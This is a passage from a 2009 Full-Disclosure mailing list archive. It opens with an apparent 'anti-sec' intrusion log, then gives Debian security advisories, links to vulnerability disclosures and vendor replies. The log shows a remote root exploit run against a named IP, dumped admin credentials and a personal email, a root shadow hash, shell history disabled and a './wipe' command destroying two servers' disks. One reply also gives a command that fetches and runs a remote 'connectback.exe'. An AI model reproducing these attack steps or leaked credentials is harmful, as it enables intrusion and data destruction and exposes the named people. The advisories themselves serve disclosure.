firstname,lastname,email,username,password from tbladmins; +-----------+----------+-----------------+----------+--------------- - -------------------+ | firstname | lastname | email | username | password | +-----------+----------+-----------------+----------+--------------- - -------------------+ | Logan | Douglas | Logan at ssanz.net | Admin | c6df529826cf16ac5bedb424d8ac972b | +-----------+----------+-----------------+----------+--------------- - -------------------+ 1 row in set (0.06 sec) mysql> quit Bye sh-3.2# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda5 2.0G 477M 1.4G 26% / /dev/sda8 875G 147G 684G 18% /home /dev/sda3 9.7G 6.8G 2.5G 74% /usr /dev/sda2 9.7G 7.0G 2.3G 76% /var /dev/sda1 99M 23M 72M 24% /boot /dev/sda6 996M 64M 881M 7% /tmp tmpfs 3.9G 0 3.9G 0% /dev/shm /dev/sdb1 459G 163G 273G 38% /backup sh-3.2# ./wipe sh-3.2# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda5 64Z 64Z 1.5G 100% / /dev/sda8 64Z 64Z 729G 100% /home /dev/sda3 64Z 64Z 3.0G 100% /usr /dev/sda2 64Z 64Z 3.0G 100% /var /dev/sda1 16Z 16Z 0 100% /boot /dev/sda6 64Z 64Z 933M 100% /tmp tmpfs 3.9G 0 3.9G 0% /dev/shm /dev/sdb1 64Z 64Z 296G 100% /backup sh-3.2# exit exit - ----------------------------------- osiris [ DOWN ] devil [ UP ] - ----------------------------------- anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22 [+] 0wn0wn - anti-sec group [+] Target: 66.197.204.101 [+] SSH Port: 22 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] sh-3.2# export HISTFILE=/dev/null sh-3.2# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh-3.2# uname -a Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux sh-3.2# head -n1 /etc/shadow root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7::: sh-3.2# w 04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 125.238.144.224 20:18 7:51m 6:38 6:38 htop sh-3.2# pwd /root sh-3.2# ls -la total 1232 drwxr-x--- 23 root root 4096 Jul 4 04:06 . drwxr-xr-x 25 root root 4096 Jun 29 14:33 .. - -rw------- 1 root root 957 Jun 13 05:20 .accesshash - -rw------- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg - -rw------- 1 root root 7258 Jun 30 10:03 .bash_history - -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout - -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile - -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6 - -rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq - -rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel drwx------ 3 root root 4096 Jun 12 00:17 .cpobjcache drwxr-xr-x 2 root root 4096 Aug 21 2006 cse - -rw-r--r-- 1 root root 12207 Oct 10 2008 cse.tgz drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf - -rw-r--r-- 1 root root 431490 Jun 5 10:52 csf.tgz - -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc drwx------ 2 root root 4096 Jun 12 01:51 .elinks - -rw-r--r-- 1 root root 16 Jun 13 15:33 .forward drwx------ 3 root root 4096 Jun 11 23:59 .gconf drwx------ 2 root root 4096 Jun 11 23:59 .gconfd drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem drwx------ 2 root root 4096 Jun 12 01:53 .gnupg drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1 - -rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz - -rw-r--r-- 1 root root 561 Jun 12 23:31 .htoprc - -rw-r--r-- 1 root root 4239 Jun 12 00:01 install.log.syslog drwx------ 6 root root 4096 Jun 12 02:33 .MirrorSearch - -rw------- 1 root root 37 Jun 12 02:11 .my.cnf drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6 - -rw-r--r-- 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz - -rw-r--r-- 1 root root 264 Jun 23 00:23 .pearrc drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html - -rw------- 1 root root 1024 Jun 12 02:50 .rnd drwx------ 3 root root 4096 Jun 12 02:41 .spamassassin drwx------ 2 root root 4096 Jun 22 09:11 .ssh - -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi sh-3.2# cat .bash_history sh hninst.sh passwd fdisk -l exit w history screen -ls screen -r 2785.pts-0.devil exit wget http://merovingian.net.nz/htop-0.8.1.tar.gz [snip] csf -a 125.238.144.110 exit cd /home ls wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz [snip] wget http://visit4cash.net/mainfiles.tar.gz mv mainfiles.tar.gz /home/visit4ca/public_html cd /home cd visit4ca cd public_html ls tar zxvf mainfiles.tar.gz [snip] csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.38.206.233 csf --restart netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 118.94.59.33 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n [snip] screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/ i686/Fedora-11-i686-Live.iso screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor a/x86_64/iso/Fedora-11-x86_64-DVD.iso screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor a/x86_64/iso/Fedora-11-x86_64-netinst.iso sh-3.2# cat /etc/userdomains advertising.ssanz.net: adserver forums.visit4cash.net: forumsv4 megacashzone.com: megacash visit4cash.net: visit4ca seanone.com: seanonec backup2.ssanz.net: backup2 *: nobody sh-3.2# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda3 31G 7.5G 22G 26% / /dev/sdb1 452G 35G 394G 9% /home /dev/sda1 99M 23M 72M 24% /boot tmpfs 495M 4.0K 495M 1% /dev/shm /usr/tmpDSK 485M 14M 446M 3% /tmp sh-3.2# who root pts/0 2009-07-03 20:18 (125.238.144.224) sh-3.2# ./wipe sh-3.2# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda3 64Z 64Z 24G 100% / /dev/sdb1 64Z 64Z 417G 100% /home /dev/sda1 16Z 16Z 77M 100% /boot tmpfs 495M 4.0K 495M 1% /dev/shm /usr/tmpDSK 485M 14M 446M 3% /tmp sh-3.2# exit exit - ----------------------------------- osiris [ DOWN ] devil [ DOWN ] - ----------------------------------- Once again, practice what you preach. Don't claim to be something you're not. Most importantly, don't go after us. We're not the problem. What you say does not align AT ALL with what you actually do with your servers. Fix that first, you dig? ~ There will always be no way out. -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkpPG9IACgkQDJfdxdA7QInVBwP/TP20s4O20zQnZFdF3KkB/aLngSLR 0p2RiBIJyJQyx/rBJOb40xeuSDwZVPUBr/J8UqfjsbEM2h9BWyg+gTadJVrZug3zyPB9 tC0pnuPtAqvOyuPEImKJD57Pq2GbdcJzkOvoCUXI+9x/LwpZgBozoGQyEJXuxHN7MqBN oWOwDvc= =TXeA -----END PGP SIGNATURE----- -- Click to get information on owning your own franchise. Great products. Low entry cost. http://tagline.hushmail.com/fc/BLSrjkqkQjmFxedkpUXtNBu5X4VuOb8F8lzN1ZrBi4NXEJpjI6RmoL1hj8E/ From white at debian.org Sat Jul 4 03:53:03 2009 From: white at debian.org (Steffen Joeris) Date: Sat, 4 Jul 2009 12:53:03 +1000 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1826-1] New eggdrop packages fix several vulnerabilities Message-ID: <20090704025303.8CA45848353@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1826-1 security at debian.org http://www.debian.org/security/ Steffen Joeris July 04, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : eggdrop Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-2807 CVE-2009-1789 Debian Bugs : 427157 528778 Several vulnerabilities have been discovered in eggdrop, an advanced IRC robot. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-2807 It was discovered that eggdrop is vulnerable to a buffer overflow, which could result in a remote user executing arbitrary code. The previous DSA (DSA-1448-1) did not fix the issue correctly. CVE-2009-1789 It was discovered that eggdrop is vulnerable to a denial of service attack, that allows remote attackers to cause a crash via a crafted PRIVMSG. For the stable distribution (lenny), these problems have been fixed in version 1.6.19-1.1+lenny1. For the old stable distribution (etch), these problems have been fixed in version 1.6.18-1etch2. For the unstable distribution (sid), this problem has been fixed in version 1.6.19-1.2 We recommend that you upgrade your eggdrop package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2.dsc Size/MD5 checksum: 650 594b4749b9ec89f7d369643895710ad8 http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2.diff.gz Size/MD5 checksum: 8016 1a18e0a558c7de704c220e6ed0f14bff http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18.orig.tar.gz Size/MD5 checksum: 1025608 c2734a51926bdf0380d8bb53f5a7b2ee Architecture independent packages: http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop-data_1.6.18-1etch2_all.deb Size/MD5 checksum: 413124 5f8afe289ebefcc7921fc1a9189c7efd alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_alpha.deb Size/MD5 checksum: 597062 c79a36069bad2181b84fc8d49b944b16 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_amd64.deb Size/MD5 checksum: 537512 9c3244b387ee9ceddb1dda220247a4f1 arm architecture (ARM) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_arm.deb Size/MD5 checksum: 498890 055e953dcb486f625a15459dc55aab19 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_hppa.deb Size/MD5 checksum: 600144 ac69ebc0c01053cd4cbd35eba71546a8 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_i386.deb Size/MD5 checksum: 475340 945bb805188e10c0ce96e0b5d2295deb ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_ia64.deb Size/MD5 checksum: 755532 724ae130ed456eb5d5a229fa9a9c1669 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_mips.deb Size/MD5 checksum: 533850 60232404dbc3aab7be1bbd44f9727cf7 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_mipsel.deb Size/MD5 checksum: 537320 40f9df7e42a932ea8c0c91d9c778505d powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_powerpc.deb Size/MD5 checksum: 522414 27b819f07a51ef3027bf89e77afbfeea s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_s390.deb Size/MD5 checksum: 530102 32d0911a7a50d9de96313ec56d707c09 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch2_sparc.deb Size/MD5 checksum: 490614 8985bad87328abe986ccd99d5d4a106f Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1.dsc Size/MD5 checksum: 1083 0fbb3a99c0027705fd9459ff03fce710 http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19.orig.tar.gz Size/MD5 checksum: 1033152 4d89a901e95f0f9937f4ffac783d55d8 http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1.diff.gz Size/MD5 checksum: 17603 73742e8b01487405d815296f5fb91a58 Architecture independent packages: http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop-data_1.6.19-1.1+lenny1_all.deb Size/MD5 checksum: 412066 7e5a850e026fe53cfade4e6dd43948af alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_alpha.deb Size/MD5 checksum: 593730 d791d84436f4ba40ac542afdb5181588 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_amd64.deb Size/MD5 checksum: 545870 0bba74f2562866bb282d5ac9c575d042 arm architecture (ARM) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_arm.deb Size/MD5 checksum: 507040 86269695984245a98e23a2ec3c48259d armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_armel.deb Size/MD5 checksum: 523006 14ec7c7ea8de55c77a554c2b8871231a hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_hppa.deb Size/MD5 checksum: 591212 9f79dac9962932605a4dc331f201736d i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_i386.deb Size/MD5 checksum: 468618 1231dad4cd3f847298efd9c453ec7a67 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_ia64.deb Size/MD5 checksum: 750226 a24c908ebc0e6ee68f5d07778527b767 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_mips.deb Size/MD5 checksum: 523760 a62db58be23b5a3b2d568344f1d7503d mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_mipsel.deb Size/MD5 checksum: 526202 431f1302ef1539336b57887e58317aa5 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_powerpc.deb Size/MD5 checksum: 532980 435c9a597ba6a84b2f7fb655fbd06d2b s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_s390.deb Size/MD5 checksum: 527910 4b95f23c5e1cd5120d5bfaf0fc4e420f sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.19-1.1+lenny1_sparc.deb Size/MD5 checksum: 479812 cabbfb068f710ecba8715a89815fe252 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkpOw2wACgkQ62zWxYk/rQe2VACeKGzfpUAXZEfTvVPOmQqRW9Z5 /5oAnA+PZjuAarXURzc923k2zul0vzag =R3e5 -----END PGP SIGNATURE----- From kcope2 at googlemail.com Sun Jul 5 08:01:56 2009 From: kcope2 at googlemail.com (Kingcope) Date: Sun, 5 Jul 2009 09:01:56 +0200 Subject: [Full-disclosure] Some small 0day... Message-ID: <72f8221d0907050001n3b5bc3f8mb408398975c78a7@mail.gmail.com> Please consult the links. SunOne Webserver : http://isowarez.de/SunOne_Webserver.txt xscreensaver : http://isowarez.de/xscreensaver.txt Best Regards, Nikolaos Rangos From fdiggle at gmail.com Mon Jul 6 05:22:22 2009 From: fdiggle at gmail.com (Fredrick Diggle) Date: Sun, 5 Jul 2009 23:22:22 -0500 Subject: [Full-disclosure] One Click Ownage [White Paper and Scripts] In-Reply-To: <6dc88c3c0907030350l54f956d6m4b9f9c7a950b16c0@mail.gmail.com> References: <6dc88c3c0907030350l54f956d6m4b9f9c7a950b16c0@mail.gmail.com> Message-ID: Or just 'start \\DiggleSec.com\fredrick\connectback.exe' would have also been acceptable. But Fredrick is sure that your 20 page write-up was fantastically entertaining. On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna wrote: > This is a different and more practical approach to get a reverse shell > or code execution in SQL Injections (particularly in MSSQL). The idea > is simple. Getting a reverse shell from an SQL Injection with one HTTP > request without using an extra channel such as TFTP, FTP to upload the > initial payload. > > White paper explains the steps and the details of the attack. Scripts > got all the tools you need to create your HTTP request with your own > payload. > > > White Paper: > http://ferruh.mavituna.com/papers/oneclickownage.pdf > > Scripts: > http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip > > Presentation (IT Underground 2009): > http://www.slideshare.net/fmavituna/one-click-ownage-1660539 > > > > Regards, > > > -- > http://ferruh.mavituna.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From research at sec-consult.com Mon Jul 6 10:08:25 2009 From: research at sec-consult.com (Bernhard Mueller) Date: Mon, 6 Jul 2009 11:08:25 +0200 Subject: [Full-disclosure] Pwning Nokia phones (and other Symbian based smartphones) Message-ID: <1246871305.2737.39.camel@b4byl0n> Hello, I'll just leave this here ;) https://www.sec-consult.com/files/SEC_Consult_Vulnerability_Lab_Pwning_Symbian_V1.03_PUBLIC.pdf Abstract: 1. Perform static analysis of XIP ROM images (dumping, restoring import and export tables, searching for unsafe function calls) 2. Enable run mode debugging of system binaries running from ROM, by cracking the AppTRK debug agent 3. (Ab-)use the AppTRK debug agent as a foundation for dynamic vulnerability analysis 3. Build an exemplary file fuzzer for the video- and audio codecs shipped with current Nokia smartphones 4. List and briefly analyze the identified bugs 5. Discuss further ideas and concepts, such as jailbreak shellcode, and an IRC bot trojan for Symbian We aim to show that it is possible to find and exploit bugs on Symbian smartphones, even in preinstalled system applications, without having access to special development hardware, and that exploits and worms similar to those found on desktop systems may be possible on Symbian. The bugs listed in this paper have been sent to Nokia and are currently under review. Mobile phone manufacturers should be aware that remote vulnerabilities of the kind discussed in this paper could be used in targeted attacks to remotely compromise a smartphone (track GPS, turn on mic, etc.), or as a means of propagation for mobile network worms. -- _________________________________________ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile +43 676 840301 718 email b.mueller at sec-consult.com Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstra?e 10, A-2700 Wiener Neustadt Advisor for your information security. From svrt at bkav.com.vn Mon Jul 6 11:13:26 2009 From: svrt at bkav.com.vn (Bkis) Date: Mon, 06 Jul 2009 17:13:26 +0700 Subject: [Full-disclosure] [Bkis-10-2009] Photo DVD Maker Professional Buffer Overflow Vulnerability Message-ID: <4A51CE46.8040104@bkav.com.vn> Title : Photo DVD Maker Professional Buffer Overflow Vulnerability 1. General Information Photo DVD Maker Professional is a tool allows you to create entertaining photo slideshows with many file formats supported. Bkis has just detected a vulnerability in the software related to the processing of Photo DVD Maker Professional project files (?.pdm?). This vulnerability permits hackers to execute malicious code on users? systems. Details : http://blog.bkis.com/?p=713 Bkis Advisory : Bkis-10-2009 Initial vendor notification : 12/06/2009 Release Date : 06/07/2009 Update Date : 06/07/2009 Discovered by : Le Duc Anh - Bkis Attack Type : Buffer Overflow Security Rating : High Impact : Code Execution Affected Software : Photo DVD Maker Professional version <= 8.02 (Prior versions may also be affected). PoC : http://blog.bkis.com/wp-content/uploads/2009/07/photodvdmaker_poc.pdm 2. Technical Description PDM files are used to store essential information about a Photo DVD Maker Professional Project (in XML format). The software performs inadequate check for the length of a File_Name tag. This results in a critical buffer overflow error when set with an overly long value. In order to exploit, a hacker might create a specially crafted ?.pdm? file and trick users into using it. If successful, hackers can perform local attack, inject viruses, steal sensitive information and even take control of the victim?s system. 3. Solution Rating this vulnerability high severity and due to the fact that the vendor hasn?t released any patch against this vulnerability, Bkis recommends that users should not open any untrusted PDM file. From timb at nth-dimension.org.uk Mon Jul 6 01:44:42 2009 From: timb at nth-dimension.org.uk (Tim Brown) Date: Mon, 6 Jul 2009 01:44:42 +0100 Subject: [Full-disclosure] Medium security hole in TekRADIUS Message-ID: <200907060144.49569.timb@nth-dimension.org.uk> Hi, I've identified a couple of security flaws affecting the TekRADIUS radius server for Windows which may allow privilege escalation. These issues were reported by email to the vendor and have I believe been resolved. Tim -- Tim Brown -------------- next part -------------- A non-text attachment was scrubbed... Name: NDSA20090412.txt.asc Type: application/pgp-keys Size: 4927 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090706/0e8fad55/attachment.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090706/0e8fad55/attachment-0001.bin From timb at nth-dimension.org.uk Mon Jul 6 01:50:52 2009 From: timb at nth-dimension.org.uk (Tim Brown) Date: Mon, 6 Jul 2009 01:50:52 +0100 Subject: [Full-disclosure] High security hole in NullLogic Groupware Message-ID: <200907060151.01723.timb@nth-dimension.org.uk> Hi, I've identified a couple of security flaws affecting the NullLogic Groupware which may allow compromise of accounts, denial of service or even remote code execution. ?These issues were reported by email to the developer but no response was forthcoming. ? Tim -- Tim Brown -------------- next part -------------- A non-text attachment was scrubbed... Name: NDSA20090413.txt.asc Type: application/pgp-keys Size: 4814 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090706/cea862f6/attachment.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090706/cea862f6/attachment-0001.bin From white at debian.org Mon Jul 6 11:20:06 2009 From: white at debian.org (Steffen Joeris) Date: Mon, 6 Jul 2009 20:20:06 +1000 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1827-1] New ipplan packages fix cross-site scripting Message-ID: <20090706102006.0FB5AB10017@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1827-1 security at debian.org http://www.debian.org/security/ Steffen Joeris July 06, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : ipplan Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE ID : CVE-2009-1732 Debian Bug : 530271 It was discovered that ipplan, a web-based IP address manager and tracker, does not sufficiently escape certain input parameters, which allows remote attackers to conduct cross-site scripting attacks. For the stable distribution (lenny), this problem has been fixed in version 4.86a-7+lenny1. The oldstable distribution (etch) does not contain ipplan. For the testing distribution (squeeze) this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 4.91a-1.1. We recommend that you upgrade your ipplan packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/ipplan/ipplan_4.86a-7+lenny1.diff.gz Size/MD5 checksum: 24624 1337c00d254c8e9fe8ca1d7b0764c7d2 http://security.debian.org/pool/updates/main/i/ipplan/ipplan_4.86a.orig.tar.gz Size/MD5 checksum: 1463553 04a5da8b7e08fcf5bfe0afc31bb7f711 http://security.debian.org/pool/updates/main/i/ipplan/ipplan_4.86a-7+lenny1.dsc Size/MD5 checksum: 1142 37202f9941e647237b80853e536e11ef Architecture independent packages: http://security.debian.org/pool/updates/main/i/ipplan/ipplan_4.86a-7+lenny1_all.deb Size/MD5 checksum: 755870 2a38517b8ad7b3e1371025a4e834effd These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkpRzzAACgkQ62zWxYk/rQeNjwCgmdOXQtTKtY9RHKsvARb/OMO5 1esAni4vTmGq7MIlbQrf7wvc7ukzL0Iw =owoO -----END PGP SIGNATURE----- From kcope2 at googlemail.com Mon Jul 6 13:27:19 2009 From: kcope2 at googlemail.com (Kingcope) Date: Mon, 6 Jul 2009 14:27:19 +0200 Subject: [Full-disclosure] Oops! About xscreensaver 5.01 Message-ID: <72f8221d0907060527m4786e996j79dbd957b359bd89@mail.gmail.com> Hello list, Just to clarify, I tested some operating systems against the xscreensaver vulnerability I posted yesterday. It affects at least xscreensaver 5.01. It does not affect recent versions as reported by the Debian bug tracking people, this is confirmed. Sorry about not catching this. Best Regards, /nr From kcope2 at googlemail.com Mon Jul 6 14:11:12 2009 From: kcope2 at googlemail.com (Kingcope) Date: Mon, 6 Jul 2009 15:11:12 +0200 Subject: [Full-disclosure] Oops! About xscreensaver 5.01 In-Reply-To: <72f8221d0907060527m4786e996j79dbd957b359bd89@mail.gmail.com> References: <72f8221d0907060527m4786e996j79dbd957b359bd89@mail.gmail.com> Message-ID: <72f8221d0907060611w5ac28d77h113393dd6c926a6d@mail.gmail.com> Hmmm, sorry for flooding the list but it seems it doesnt even affect xscreensaver 5.01. I will investigate when the vuln when I have time and keep you informed. There has to be some strange conf on my Opensolaris :) Best Regards, kcope 2009/7/6 Kingcope : > Hello list, > Just to clarify, I tested some operating systems against the > xscreensaver vulnerability > I posted yesterday. > It affects at least xscreensaver 5.01. > > It does not affect recent versions as reported > by the Debian bug tracking people, this is confirmed. > > Sorry about not catching this. > > Best Regards, > /nr > From ShakedV at Radware.com Mon Jul 6 13:18:41 2009 From: ShakedV at Radware.com (Shaked Vax) Date: Mon, 6 Jul 2009 15:18:41 +0300 Subject: [Full-disclosure] FW: Re[2]: Radware AppWall Web Application Firewall: Source code disclosure on management interface Message-ID: <06DA44B99382B2428AD8DBFEE6CD209FAFDC8B@APOLLO.il.corp.radware.com> Hello Vladimir Let's clarify what is the .inc vulnerability all about: In order to take advantage of this vulnerability one needs to: 1. Have access to internal AppWall management URL 2. Have credentials (user and password) of the AppWall Web Interface. Without the credentials one cannot access the /Management/ folder at all ! Once you have access to the .inc file you can retrieve the server's source code. In most applications it is not "a good practice" (to say the least) to expose your source code even your authenticated users. In AppWall's case there is nothing interesting to hide in the inc files, since if 